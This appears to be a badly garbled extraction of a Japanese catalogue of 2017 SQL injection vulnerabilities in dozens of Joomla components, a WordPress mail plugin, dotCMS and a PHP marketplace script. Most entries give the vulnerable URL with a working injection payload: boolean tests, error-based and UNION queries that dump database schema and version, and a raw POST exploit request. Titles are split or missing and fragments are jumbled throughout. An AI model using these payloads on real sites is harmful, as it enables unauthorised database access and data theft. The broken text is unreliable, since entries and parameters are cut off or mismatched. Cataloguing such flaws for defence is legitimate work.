Component JE

Video Rate 1.0


Joomla! Component JE Tour 2.0


性

/index.php?option=com_jetour&view=package_detail&pid=


Joomla!

Component JE

Tour 2.0


Joomla! Component JE Property

Finder 1.6.3 - index.php SQL

Injection 脆弱性

/index.php?option=com_jepropertyfinder&view=section_de

tail&sf_id=1%20and%201=1--Joomla

Joomla!

Component JE

Property

Finder 1.6.3


Joomla! Component JE

QuoteForm - index.php SQL

Injection 脆弱性

/index.php?option=com_jequoteform&view=form&Itemid=


Joomla!

Component JE

QuoteForm


Joomla! Component JE Directory


弱性

/index.php?option=com_jedirectory&view=item_detail&dite

mid=1%20and%201=1--Joomla

Joomla!

Component JE

Directory 1.7


Joomla! Component JE Gallery


弱性

/index.php?option=com_jegallery&view=photo_detail&phot

o_id=1%20and%201=1--Joomla

Joomla!

Component JE

Gallery 1.3


Joomla! Component JE Classify

Ads 1.2 - index.php SQL

Injection 脆弱性

/index.php?option=com_jeclassifyads&view=item_detail&pr

o_id=1%20and%201=1--Joomla

Joomla!

Component JE

Classify Ads

1.2

2017-02-13 41329 SQL Injection 難高PHP Marketplace Script -

/shopby/ SQL Injection 脆弱性

/shopby/all?q=LIEQ") AND (SELECT 7200 FROM(SELECT

COUNT(*),CONCAT(0x7170767871,(SELECT

(ELT(7200=7200,1))),0x7176766271,FLOOR(RAND(0)*2))x

FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

AND ("SRxl"="SRxl

PHP

Marketplace

Script

PHP

Marketplace

Script

2017-02-15 41362 SQL Injection 易中Joomla! Component JoomBlog

1.3.1 - SQL Injection

/index.php?option=com_joomblog&task=tag&tag=Ihsan_S

encan%27%20and%201=1--Joomla

Joomla!

Component

JoomBlog

1.3.1





Joomla! Component JSP Store

Locator 2.2 - 'id' Parameter SQL

Injection

/index.php?option=com_jsplocation&task=directionview&id


Joomla!

Component

JSP Store

Locator 2.2


Joomla! Component JEmbedAll


弱性

/index.php?option=com_jembedall&downloadfree=1%20an

d%201=1--Joomla

Joomla!

Component

JEmbedAll 1.4


Joomla! Component Spider

Calendar Lite 3.2.16 - SQL

Injection

/index.php?option=com_spidercalendar&view=spidercalend

ar&calendar_id=1%20and%201=1--Joomla

Joomla!

Component

Spider

Calendar Lite

3.2.16


Joomla! Component Spider

Catalog Lite 1.8.10 - index.php


/index.php?option=com_spidercatalog&product_id=40&vie

w=showproduct&page_num=1&back=1&show_category_d

etails=0&display_type=list&show_subcategories=0&show_s

ubcategories_products=0&show_products=1&select_categ

ories=0&Itemid=1%20and%201=1--

Joomla

Joomla!

Component

Spider Catalog

Lite 1.8.10

2017-02-16 41373 SQL Injection 易中Joomla! Component Spider

Facebook 1.6.1 - SQL Injection

/index.php?option=com_spiderfacebook&task=loginwith&n

ame=1%20and%201=1--Joomla

Joomla!

Component

Spider

Facebook

1.6.1

2017-02-16 41374 SQL Injection 易中Joomla! Component Spider FAQ

Lite 1.3.1 - SQL Injection

/index.php?option=com_spiderfaq&view=spiderfaqmultiple

&standcat=0&faq_cats=,2,3,&standcatids=&theme=1&sear

chform=1&expand=0&Itemid=1%20and%201=1--Joomla

Joomla!

Component

Spider FAQ

Lite 1.3.1

2017-02-16 41377 SQL Injection 中中dotCMS 3.6.1 - / SQL Injection

脆弱性

/categoriesServlet?q=%5c%5c%27)+OR%2f%2a%2a%2f(SEL

ECT(SUBSTRING((SELECT(${column})FROM(${database}.user_

)LIMIT%2f%2a%2a%2f${index},1),${offset},1)))LIKE+BINARY+

${char}%2f%2a%2a%2fORDER+BY+category.sort_order%23

dotCMS dotCMS 3.6.1


Joomla! Component WMT

Content Timeline 1.0 -


/index.php?option=com_wmt_content_timeline&task=retur

nArticle&id=66666+/*!50000union*/+select+1,2,3,4,5,6,7,8,

9,10,0x496873616e2053656e63616e203c62723e207777772

e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+c

ount(*)from(information_schema.columns)where@:=export_

set(5,export_set(5,@,table_name,0x3c6c693e,2),column_nam

e,0xa3a,2)),@,2)),13,14,15--+-

Joomla

Joomla!

Component

WMT Content

Timeline 1.0


Joomla! Component Groovy

Gallery 1.0.0 - index.php SQL

Injection 脆弱性

/index.php?option=com_groovygallery&view=images&filter

_category=1%20and%201=1--Joomla

Joomla!

Component

Groovy Gallery

1.0.0


Joomla! Component Team

Display 1.2.1 - index.php SQL

Injection 脆弱性

/index.php?option=com_teamdisplay&view=members&filte

r_category=1%20and%201=1--Joomla

Joomla!

Component

Team Display

1.2.1


WordPress Plugin Mail Masta

1.0 - csvexport.php SQL

Injection 脆弱性

/wp-content/plugins/mail-

masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/va

r/www/html/wordpress/wp-load.phpWordPress

WordPress

Plugin Mail

Masta 1.0



1.0 - admin.php SQL Injection

脆弱性

/wp-admin/admin.php?page=masta-

lists&action=view_list&filter_list=0+OR+1%3D1WordPress

WordPress

Plugin Mail

Masta 1.0



1.0 - admin-ajax.php SQL

Injection 脆弱性

POST /wp-admin/admin-ajax.php?id= HTTP/1.1

Host:



Safari/535.7

Accept: */*


charset=UTF-8

action=my_action&url=%2Fvar%2Fwww%2Fhtml%2Fwp-

content%2Fplugins%2Fmail-

masta%2Finc%2Fcampaign_save.php&sender_selected_list_c

heck=check&list_id=1+OR+1%3D1

WordPress

WordPress

Plugin Mail

Masta 1.0


Joomla! Component Most

Wanted Real Estate 1.1.0 - /


/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1mi

nprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1mi

nbed=0&filter_a1minbaths=&filter_a1minarea=&filter_a1m

axarea=&filter_a1minland=&filter_a1maxland=&filter_a1lan

dtype=0&which_order=1%20and%201=1--

Joomla

Joomla!

Component

Most Wanted

Real Estate

1.1.0


Joomla! Component Google

Map Store Locator 4.4 - / SQL

Injection 脆弱性

/?filter_to=a&filter_day=21-02-

2017&filter_time=+/*!50000Procedure*/+/*!50000Analyse*/

+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053

656e63616e,0x3a,@@version)),0)-- -

Joomla

Joomla!

Component

Google Map

Store Locator

4.4





Joomla! Component Bazaar

Platform 3.0 - index.php SQL

Injection 脆弱性

/index.php?option=com_bazaar&view=productsearch&sear

chproduct=a&category=1+/*!50000Procedure*/+/*!50000A

nalyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x49687361

6e2053656e63616e,0x3a,@@version)),0)-- -

Joomla

Joomla!

Component

Bazaar

Platform 3.0


Joomla! Component Room

Management 1.0 - /room/ SQL

Injection 脆弱性

/room/book?tmpl=component&id=5&date='+/*!50000Pro

cedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat

*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0

)-- -

Joomla

Joomla!

Component

Room

Management

1.0


Joomla! Component OS Services

Booking 2.5.1 - index.php SQL

Injection 脆弱性

/index.php?option=com_osservicesbooking&task=default_s

howmap&vid=1%20and%201=1--Joomla

Joomla!

Component

OS Services

Booking 2.5.1


Joomla! Component EShop 2.5.1


性

/index.php?option=com_eshop&view=category&id=1%20a

nd%201=1--Joomla

Joomla!

Component

EShop 2.5.1


Joomla! Component OS

Property 3.0.8 - index.php SQL

Injection 脆弱性

/index.php?option=com_osproperty&view=ltype&catIds[0]


Joomla!

Component

OS Property

3.0.8


Joomla! Component Joomloc-

CAT 4.1.3 - index.php SQL

Injection 脆弱性

/index.php?option=com_joomloc&view=engine&layout=ge

o&liste=65&place=dep&ville=1%20and%201=1--Joomla

Joomla!

Component

Joomloc-CAT

4.1.3


Joomla! Component Joomloc-

Lite 1.3.2 - index.php SQL

Injection 脆弱性

/index.php?option=com_joomloc&view=loc&layout=singlel

oc&site_id=1%20and%201=1--Joomla

Joomla!

Component

Joomloc-Lite

1.3.2


Joomla! Component JomWALL

4.0 - 'wuid' Parameter SQL

Injection

/index.php?option=com_awdwall&task=gethovercard&wuid


Joomla!

Component

JomWALL 4.0


Joomla! Component MaQma

Helpdesk 4.2.7 - index.php SQL

Injection 脆弱性

/index.php?option=com_maqmahelpdesk&task=pdf_kb&id


Joomla!

Component

MaQma

Helpdesk 4.2.7


Joomla! Component PayPal IPN

for DOCman 3.1 - index.php

SQL Injection

/index.php?option=com_docmanpaypal&task=addToCart&i

d=1%20and%201=1--Joomla

Joomla!

Component

PayPal IPN for

DOCman 3.1


Joomla! Component

AppointmentBookingPro 4.0.1 -


/index.php?option=com_rsappt_pro3&view=resourceslist&t

ags=1%20and%201=1--Joomla

Joomla!

Component

AppointmentB

ookingPro

4.0.1


Joomla! Component J-

HotelPortal 6.0.2 - 'review_id'

Parameter SQL Injection

/index.php?option=com_jhotelreservation&tmpl=compone

nt&task=hotelratings.printRating&view=hotelratings&revie

w_id=1%20and%201=1--

Joomla

Joomla!

Component J-

HotelPortal

6.0.2



CruiseReservation Standard 3.0 -

'city' Parameter SQL Injection

/cruises/cruises?city=1%20and%201=1-- Joomla

Joomla!

Component J-

CruiseReservat

ion Standard

3.0


Joomla! Component Eventix

Events Calendar 1.0 - SQL

Injection

/index.php?option=com_eventix&view=eventsday&selected

_date=2017-02-16&day=1%20and%201=1--Joomla

Joomla!

Component

Eventix Events

Calendar 1.0



MultipleHotelReservation

Standard 6.0.2 - index.php SQL

Injection 脆弱性

/index.php?option=com_jhotelreservation&tmpl=compone

nt&task=hotelratings.printRating&view=hotelratings&revie

w_id=1%20and%201=1--

Joomla

Joomla!

Component J-

MultipleHotelR

eservation

Standard 6.0.2


Joomla! Component Directorix

Directory Manager 1.1.1 -


/index.php?option=com_directorix&view=entriessearch&se

arch_categories[]=1%20and%201=1--Joomla

Joomla!

Component

Directorix

Directory

Manager 1.1.1


Joomla! Component Magic

Deals Web 1.2.0 - index.php


/index.php?filterbycats=all&fullordering=1%20and%201=1-

-

&option=com_magicdealsweb&task=dealswebindex&view

=dealswebindex

Joomla

Joomla!

Component

Magic Deals

Web 1.2.0



BusinessDirectory 4.6.8 - SQL

Injection

/index.php?option=com_jbusinessdirectory&view=compani

es&companyId=1%20and%201=1--Joomla

Joomla!

Component J-

BusinessDirect

ory 4.6.8





Joomla! Component

AppointmentBookingPro 4.0.1 -


/component/rsappt_pro3/booking_screen_gad/891/show_c

onfirmation/ff09f352c87f96e505706df0cfa3e8cc/999%27%2

0and%201=1--

Joomla

Joomla!

Component

AppointmentB

ookingPro

4.0.1


Joomla! Component

MediaLibrary Basic 3.5 -


(2)

/index.php/medialibrary/media/all-books/all-

books/345/lend_request?mid[0]=1%20and%201=1--Joomla

Joomla!

Component

MediaLibrary

Basic 3.5


Joomla! Component

ContentMap 1.3.8 - 'contentid'

Parameter SQL Injection

/index.php?option=com_contentmap&owner=plugin&view

=smartloader&id=10135&Itemid=606&type=json&filenam

e=articlesmarkers&source=article&contentid=1%20and%2

01=1--

Joomla

Joomla!

Component

ContentMap

1.3.8


Joomla! Component

VehicleManager 3.9 - SQL

Injection

/index.php?option=com_vehiclemanager&Itemid=70&task

=search&submit=Search&catid=0&maker=&fuel_type=all

&model=all&listing_type=all&transmission=all&vcondition

=1%20and%201=1--

Joomla

Joomla!

Component

VehicleManag

er 3.9


Joomla! Component

RealEstateManager 3.9 - SQL

Injection

/index.php/realestate/all-houses/all-houses-

default/160/search?searchtext=a&catid=all&search_date_fr

om=2017-02-21&search_date_until=2017-02-

28&pricefrom2=114019&priceto2=750000&listing_type=all

&listing_status=1%20and%201=1--

Joomla

Joomla!

Component

RealEstateMan

ager 3.9


Joomla! Component BookLibrary


脆弱性

/index.php?option=com_booklibrary&task=suggestion&co

mment=1%20and%201=1-- Joomla

Joomla!

Component

BookLibrary

3.6.1


Joomla! Component

MediaLibrary Basic 3.5 -


/index.php/medialibrary/media/all-books/all-

books/345/view/book/19%27%20and%201=1--

/Ihsan_Sencan

Joomla

Joomla!

Component

MediaLibrary

Basic 3.5

2017-02-23 41440 SQL Injection 易中Joomla! Component Store for

K2 3.8.2 - SQL Injection

/index.php?option=com_k2store&view=checkout&task=get

Country&=1%20and%201=1--Joomla

Joomla!

Component

Store for K2

3.8.2


Joomla! Component

UserExtranet 1.3.1 - index.php


/index.php?option=com_userextranet&view=folders&fid=6

6+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,

/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a

,@@version)),0)-- -

Joomla

Joomla!

Component

UserExtranet

1.3.1


Joomla! Component MultiTier


弱性

/index.php/component/multitier/?mtpage=takecodel&tid=

1&lid=66'+/*!50000union*/+select+1,0x496873616e20536

56e63616e,3,4,5,(Select+export_set(5,@:=0,(select+count(*)f

rom(information_schema.columns)where@:=export_set(5,ex

port_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a

,2)),@,2)),7,8+-- -

Joomla

Joomla!

Component

MultiTier 3.1

2017-02-24 41450 SQL Injection 中中Joomla! Component GPS Tools

4.0.1 - SQL Injection

/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_k

eywords=1&filter_order=a.catid&filter_order_Dir=desc&cati

d[]=66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((

SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x4968736

16e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+C

HAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMA

TA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FRO

M+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(R

AND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GRO

UP+BY+x)a)+AND+1=1

Joomla

Joomla!

Component

GPS Tools

4.0.1


Joomla! Component Community

Quiz 4.3.5 - / SQL Injection 脆弱

性

/?list_filter=Ihsan_Sencan&list_filter_field=title&filter_all_key

words=1&filter_order=a.created&filter_order_Dir=asc&catid

[]=66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((S

ELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x49687361

6e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CH

AR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMAT

A+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FRO



UP+BY+x)a)+AND+1=1&view=quizzes

Joomla

Joomla!

Component

Community

Quiz 4.3.5


Joomla! Component

JooDatabase 3.1.0 - index.php


/index.php?option=com_joodb&view=catalog&format=htm

l&reset=false&Itemid=321&task=&search=1%20and%201

=1--&searchfield=Ihsan_SencanJoomla

Joomla!

Component

JooDatabase

3.1.0


Joomla! Component JO

Facebook Gallery 4.5 -


/index.php?option=com_jofacebookgallery&view=category

&id=1%20and%201=1--Joomla

Joomla!

Component

JO Facebook

Gallery 4.5





Joomla! Component AJAX

Search for K2 2.2 - / SQL

Injection 脆弱性

/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&=


Joomla!

Component

AJAX Search

for K2 2.2


Joomla! Component Community

Surveys 4.3 - / SQL Injection 脆

弱性










UP+BY+x)a)+AND+1=1

Joomla

Joomla!

Component

Community

Surveys 4.3

2017-02-24 41448 SQL Injection 難高Joomla! Component Community

Polls 4.5.0 - SQL Injection










UP+BY+x)a)+AND+1=1

Joomla

Joomla!

Component

Community

Polls 4.5.0


Joomla! Component Intranet

Attendance Track 2.6.5 -


/index.php?option=com_intranet&view=calendar&month=

3&year=1%20and%201=1--Joomla

Joomla!

Component

Intranet

Attendance

Track 2.6.5


Joomla! Component Gnosis


脆弱性

/index.php?option=com_gnosis&view=tags&id=1%20and%

201=1--Joomla

Joomla!

Component

Gnosis 1.1.2


Joomla! Component

Appointments for JomSocial

3.8.1 - /my-appointments/ SQL

Injection 脆弱性

/my-appointments/viewappointment?id=1%20and%201=1-

-Joomla

Joomla!

Component

Appointments

for JomSocial

3.8.1

2017-02-25 41465 SQL Injection 易中Joomla! Component JomSocial -

/groups/ SQL Injection 脆弱性/groups/?IhsanSencan=1%20and%201=1-- Joomla

Joomla!

Component

JomSocial


/videos/ SQL Injection 脆弱性/videos/?IhsanSencan=1%20and%201=1-- Joomla

Joomla!

Component

JomSocial


/events/ SQL Injection 脆弱性/events/?IhsanSencan=1%20and%201=1-- Joomla

Joomla!

Component

JomSocial

2017-02-25 41464 SQL Injection 易中Joomla! Component Spinner

360 1.3. - / SQL Injection 脆弱性/spinner-360?Ihsan_Sencan=1%20and%201=1-- Joomla

Joomla!

Component

Spinner 360

1.3.0


Joomla! Component My MSG


脆弱性

/index.php?option=com_mymsg&layout=edit&reply_id=1%

20and%201=1--Joomla

Joomla!

Component

My MSG 3.2.1


Joomla! Component

Appointments for JomSocial

3.8.1 - /my-appointments/my-

appointments/ SQL Injection 脆

弱性

/my-appointments/my-

appointments/edit?id=1%20and%201=1--Joomla

Joomla!

Component

Appointments

for JomSocial

3.8.1


Joomla! Component OneVote!

1.0 - results.php SQL Injection

脆弱性

/components/com_onevote/results.php?election_id=+/*!50

000union*/+select+@@version-- -Joomla

Joomla!

Component

OneVote! 1.0

2017...JoomlaはWordpressと同じく、多くの...

Documents

Transcript of 2017...JoomlaはWordpressと同じく、多くの...